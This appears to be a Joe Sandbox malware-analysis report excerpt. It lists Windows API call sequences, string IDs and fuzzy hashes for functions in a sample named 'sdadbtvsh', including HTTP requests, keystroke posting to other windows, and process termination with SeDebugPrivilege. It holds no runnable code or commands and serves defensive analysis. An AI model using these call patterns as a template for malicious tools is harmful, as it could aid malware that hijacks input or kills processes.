                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                              • String ID: Ping
                                                                                              • API String ID: 1028309954-2246546115
                                                                                              • Opcode ID: 878dceced7d9b4b264da953dab2a0f48fa5a9766de43c0678f2eade776c8e588
                                                                                              • Instruction ID: 368ded6fab3caa611801ad7b76b19d3f1d179c54af7dd208997b80549bed0cf9
                                                                                              • Opcode Fuzzy Hash: 878dceced7d9b4b264da953dab2a0f48fa5a9766de43c0678f2eade776c8e588
                                                                                              • Instruction Fuzzy Hash: FD91A1316042419FD720CF15C889B96BBE2FF89318F188599F5698F7A2C771ED86CB81
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetLocalTime.KERNEL32(?), ref: 00608BB1
                                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00608BC1
                                                                                              • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00608BCD
                                                                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00608C6A
                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00608C7E
                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00608CB0
                                                                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00608CE6
                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00608CEF
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: CurrentDirectoryTime$File$Local$System
                                                                                              • String ID: *.*
                                                                                              • API String ID: 1464919966-438819550
                                                                                              • Opcode ID: ceaffe8751acc04c4898d7cd385af09cfbeae82e4593c56182dc7da3af8bd747
                                                                                              • Instruction ID: f532f47bde1e1e7f6e476e7e4c644fa2fd9d84a5f43be9c74c932634562f0215
                                                                                              • Opcode Fuzzy Hash: ceaffe8751acc04c4898d7cd385af09cfbeae82e4593c56182dc7da3af8bd747
                                                                                              • Instruction Fuzzy Hash: 01616CB25047069FDB14EF20C8499AFB7E9FF89310F04891DF98997291DB31EA45CB92
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CreateMenu.USER32 ref: 006245D8
                                                                                              • SetMenu.USER32(?,00000000), ref: 006245E7
                                                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0062466F
                                                                                              • IsMenu.USER32(?), ref: 00624683
                                                                                              • CreatePopupMenu.USER32 ref: 0062468D
                                                                                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 006246BA
                                                                                              • DrawMenuBar.USER32 ref: 006246C2
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                              • String ID: 0$F
                                                                                              • API String ID: 161812096-3044882817
                                                                                              • Opcode ID: 34710669bf040c57fda46339a6b623e7d246c4dde1a12d1e3aecfa4198c43a96
                                                                                              • Instruction ID: eb06c4778995e3de5349804548257190a8e54628f807645288a2c8a65a991689
                                                                                              • Opcode Fuzzy Hash: 34710669bf040c57fda46339a6b623e7d246c4dde1a12d1e3aecfa4198c43a96
                                                                                              • Instruction Fuzzy Hash: 03414B7560161AEFDF24CF65E854AEA7BB6FF4A314F140028FA45AB350DB70A921CF50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 0059B25F: _wcslen.LIBCMT ref: 0059B269
                                                                                                • Part of subcall function 005F4536: GetClassNameW.USER32(?,?,000000FF), ref: 005F4559
                                                                                              • SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 005F27F4
                                                                                              • GetDlgCtrlID.USER32 ref: 005F27FF
                                                                                              • GetParent.USER32 ref: 005F281B
                                                                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 005F281E
                                                                                              • GetDlgCtrlID.USER32(?), ref: 005F2827
                                                                                              • GetParent.USER32(?), ref: 005F283B
                                                                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 005F283E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                              • String ID: ComboBox$ListBox
                                                                                              • API String ID: 711023334-1403004172
                                                                                              • Opcode ID: e6ee18b1516d8e635c922dccbd7a9e2da609a2ed65a06d21e511580c2d6edcc6
                                                                                              • Instruction ID: 3715a7cb853712f01dccf3522b2bbdda95f3602b4f940820da31a7833b5caf95
                                                                                              • Opcode Fuzzy Hash: e6ee18b1516d8e635c922dccbd7a9e2da609a2ed65a06d21e511580c2d6edcc6
                                                                                              • Instruction Fuzzy Hash: 8421C5B4900219BBDF15AFA0DC85EFEBF76FF45350F100115BA51972A5CB784809DB60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 0059B25F: _wcslen.LIBCMT ref: 0059B269
                                                                                                • Part of subcall function 005F4536: GetClassNameW.USER32(?,?,000000FF), ref: 005F4559
                                                                                              • SendMessageW.USER32(?,00000186,00020000,00000000), ref: 005F28D3
                                                                                              • GetDlgCtrlID.USER32 ref: 005F28DE
                                                                                              • GetParent.USER32 ref: 005F28FA
                                                                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 005F28FD
                                                                                              • GetDlgCtrlID.USER32(?), ref: 005F2906
                                                                                              • GetParent.USER32(?), ref: 005F291A
                                                                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 005F291D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                              • String ID: ComboBox$ListBox
                                                                                              • API String ID: 711023334-1403004172
                                                                                              • Opcode ID: 7d24cfb572e380bc61f29f6d278960211eca476af3f0bbdc20d711ce039e96de
                                                                                              • Instruction ID: f7ee844b6b1d34d0ae0e7eb199ef1c2af9e94ee7e2a3b213f504c6fa760fb473
                                                                                              • Opcode Fuzzy Hash: 7d24cfb572e380bc61f29f6d278960211eca476af3f0bbdc20d711ce039e96de
                                                                                              • Instruction Fuzzy Hash: DB21C2B5900218BBEF11AFA0DC49EFEBFBAFF05340F004015BA51A3295D7784859DB60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 006243FC
                                                                                              • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 006243FF
                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00624426
                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00624449
                                                                                              • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 006244C1
                                                                                              • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 0062450B
                                                                                              • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00624526
                                                                                              • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00624541
                                                                                              • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00624555
                                                                                              • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00624572
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$LongWindow
                                                                                              • String ID:
                                                                                              • API String ID: 312131281-0
                                                                                              • Opcode ID: 63c6dc58072c0792d551fc9eec1758db6882e0220e95142d58d48847bce7cdda
                                                                                              • Instruction ID: 183a86263f3c230227500cf18e685e22b5d268ab46bc2d5790465c208788a46b
                                                                                              • Opcode Fuzzy Hash: 63c6dc58072c0792d551fc9eec1758db6882e0220e95142d58d48847bce7cdda
                                                                                              • Instruction Fuzzy Hash: 8861AA75900618AFDB21CFA8DC81EEE77F9EB49710F104169FA54AB3A1CB70AA45CF50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0060CBCF
                                                                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0060CBF7
                                                                                              • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0060CC27
                                                                                              • GetLastError.KERNEL32 ref: 0060CC7F
                                                                                              • SetEvent.KERNEL32(?), ref: 0060CC93
                                                                                              • InternetCloseHandle.WININET(00000000), ref: 0060CC9E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                              • String ID:
                                                                                              • API String ID: 3113390036-3916222277
                                                                                              • Opcode ID: 1ef9194e100a9597d6c9e3262b3af78bed73e68952ed95e549a64543c2030360
                                                                                              • Instruction ID: f755082e0df831f87c8d98cf24122d8c78ab656c00cc300bb72cc9c13d4745e2
                                                                                              • Opcode Fuzzy Hash: 1ef9194e100a9597d6c9e3262b3af78bed73e68952ed95e549a64543c2030360
                                                                                              • Instruction Fuzzy Hash: 3131C0B1540704AFE7259F60CD88AAB7BFEEF49754B10461EF44AD2280DB34D9059B60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,005D5437,?,?,Bad directive syntax error,0062DCD0,00000000,00000010,?,?), ref: 005FA14B
                                                                                              • LoadStringW.USER32(00000000,?,005D5437,?), ref: 005FA152
                                                                                                • Part of subcall function 0059B25F: _wcslen.LIBCMT ref: 0059B269
                                                                                              • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 005FA216
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: HandleLoadMessageModuleString_wcslen
                                                                                              • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                              • API String ID: 858772685-4153970271
                                                                                              • Opcode ID: b755c44c9e86335b7c1898d08ffd3f27e49b4b75427f9d8b9ddf635e271e7c1f
                                                                                              • Instruction ID: aca5ef1b9cf1aa76e98100ad15bd1a6b7dcc81f4a659deb37753b93abb9cc842
                                                                                              • Opcode Fuzzy Hash: b755c44c9e86335b7c1898d08ffd3f27e49b4b75427f9d8b9ddf635e271e7c1f
                                                                                              • Instruction Fuzzy Hash: A3218B7290021EAFDF11AF90DC0AEFE7B7ABF58304F054455FA09660A2DB759A18DB11
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetParent.USER32 ref: 005F293B
                                                                                              • GetClassNameW.USER32(00000000,?,00000100), ref: 005F2950
                                                                                              • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 005F29DD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClassMessageNameParentSend
                                                                                              • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                              • API String ID: 1290815626-3381328864
                                                                                              • Opcode ID: 1b20b43f81a5718660a4167aee0f6dee511643cd1a371867faa88e440115c444
                                                                                              • Instruction ID: cbeb145f5af67f3255dee01829c67055bd95aad2eeb2c6fbc773727ef5f412e4
                                                                                              • Opcode Fuzzy Hash: 1b20b43f81a5718660a4167aee0f6dee511643cd1a371867faa88e440115c444
                                                                                              • Instruction Fuzzy Hash: 8111E3B624470BBAFB102220DC0BDF63F9DAF05721F600112FE40E60D2EAA968959955
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                                                              • String ID:
                                                                                              • API String ID: 1282221369-0
                                                                                              • Opcode ID: 4615c32238690b41593830d306ce810754809e9643cee2b62f903e393d1fa75b
                                                                                              • Instruction ID: c524ff5b8f7b9406e7dfa0e29ddd5b55393fe26a7e3392839607d19404e3d0b1
                                                                                              • Opcode Fuzzy Hash: 4615c32238690b41593830d306ce810754809e9643cee2b62f903e393d1fa75b
                                                                                              • Instruction Fuzzy Hash: 1461F672900346BFDF25AFE49885F697FB4BF42720F08057EE905EB281E6B1D84187A1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0060CADF
                                                                                              • GetLastError.KERNEL32 ref: 0060CAF2
                                                                                              • SetEvent.KERNEL32(?), ref: 0060CB06
                                                                                                • Part of subcall function 0060CBB0: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0060CBCF
                                                                                                • Part of subcall function 0060CBB0: GetLastError.KERNEL32 ref: 0060CC7F
                                                                                                • Part of subcall function 0060CBB0: SetEvent.KERNEL32(?), ref: 0060CC93
                                                                                                • Part of subcall function 0060CBB0: InternetCloseHandle.WININET(00000000), ref: 0060CC9E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                                                              • String ID:
                                                                                              • API String ID: 337547030-0
                                                                                              • Opcode ID: 5db90016617efce87dd7ff3da4be3eb8e00f41617f20d4c70fb9edb31740b301
                                                                                              • Instruction ID: 670506508831e312071a31b620fa01eacdc961a72c13e91e471be6a2987309db
                                                                                              • Opcode Fuzzy Hash: 5db90016617efce87dd7ff3da4be3eb8e00f41617f20d4c70fb9edb31740b301
                                                                                              • Instruction Fuzzy Hash: 6D31AC71240B05AFDB299FA0CD45AA7BBFAFF48320B10461DF95682650D730E816EBA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 005F42CC: GetWindowThreadProcessId.USER32(?,00000000), ref: 005F42E6
                                                                                                • Part of subcall function 005F42CC: GetCurrentThreadId.KERNEL32 ref: 005F42ED
                                                                                                • Part of subcall function 005F42CC: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,005F2E43), ref: 005F42F4
                                                                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 005F2E4D
                                                                                              • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 005F2E6B
                                                                                              • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 005F2E6F
                                                                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 005F2E79
                                                                                              • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 005F2E91
                                                                                              • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 005F2E95
                                                                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 005F2E9F
                                                                                              • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 005F2EB3
                                                                                              • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 005F2EB7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                              • String ID:
                                                                                              • API String ID: 2014098862-0
                                                                                              • Opcode ID: e39f2e6fe4d33d7dbb176d304060ce22a1556ba7e1d89b09b48ac01cb07f7fd4
                                                                                              • Instruction ID: aec6b603792b7dda3fa4d014f32d856d21af46696fe7d33c0c7783c0ab28d24b
                                                                                              • Opcode Fuzzy Hash: e39f2e6fe4d33d7dbb176d304060ce22a1556ba7e1d89b09b48ac01cb07f7fd4
                                                                                              • Instruction Fuzzy Hash: B801D8313806147BFB206769DC8EF663F5AEB89B11F101011F318AE1E0C9E11455CA69
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,005F1CD9,?,?,00000000), ref: 005F209C
                                                                                              • HeapAlloc.KERNEL32(00000000,?,005F1CD9,?,?,00000000), ref: 005F20A3
                                                                                              • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,005F1CD9,?,?,00000000), ref: 005F20B8
                                                                                              • GetCurrentProcess.KERNEL32(?,00000000,?,005F1CD9,?,?,00000000), ref: 005F20C0
                                                                                              • DuplicateHandle.KERNEL32(00000000,?,005F1CD9,?,?,00000000), ref: 005F20C3
                                                                                              • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,005F1CD9,?,?,00000000), ref: 005F20D3
                                                                                              • GetCurrentProcess.KERNEL32(005F1CD9,00000000,?,005F1CD9,?,?,00000000), ref: 005F20DB
                                                                                              • DuplicateHandle.KERNEL32(00000000,?,005F1CD9,?,?,00000000), ref: 005F20DE
                                                                                              • CreateThread.KERNEL32(00000000,00000000,005F2104,00000000,00000000,00000000), ref: 005F20F8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                              • String ID:
                                                                                              • API String ID: 1957940570-0
                                                                                              • Opcode ID: a6d95350e7c6b25f22143b520e37bc30e7df7f7b99f4cc24807851a5b381c773
                                                                                              • Instruction ID: 6dbee91fd98f2dbd9eb5adebbd4010b5c082d594be321a61beacdc275a22e696
                                                                                              • Opcode Fuzzy Hash: a6d95350e7c6b25f22143b520e37bc30e7df7f7b99f4cc24807851a5b381c773
                                                                                              • Instruction Fuzzy Hash: C601C9B5640708BFE720EFA5DC8EF6B3BADEB89711F105411FA05DB2A1CA749811CB61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 005FDC9C: CreateToolhelp32Snapshot.KERNEL32 ref: 005FDCC1
                                                                                                • Part of subcall function 005FDC9C: Process32FirstW.KERNEL32(00000000,?), ref: 005FDCCF
                                                                                                • Part of subcall function 005FDC9C: FindCloseChangeNotification.KERNELBASE(00000000), ref: 005FDD9C
                                                                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0061AACC
                                                                                              • GetLastError.KERNEL32 ref: 0061AADF
                                                                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0061AB12
                                                                                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 0061ABC7
                                                                                              • GetLastError.KERNEL32(00000000), ref: 0061ABD2
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0061AC23
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$CloseErrorLastOpen$ChangeCreateFindFirstHandleNotificationProcess32SnapshotTerminateToolhelp32
                                                                                              • String ID: SeDebugPrivilege
                                                                                              • API String ID: 1701285019-2896544425
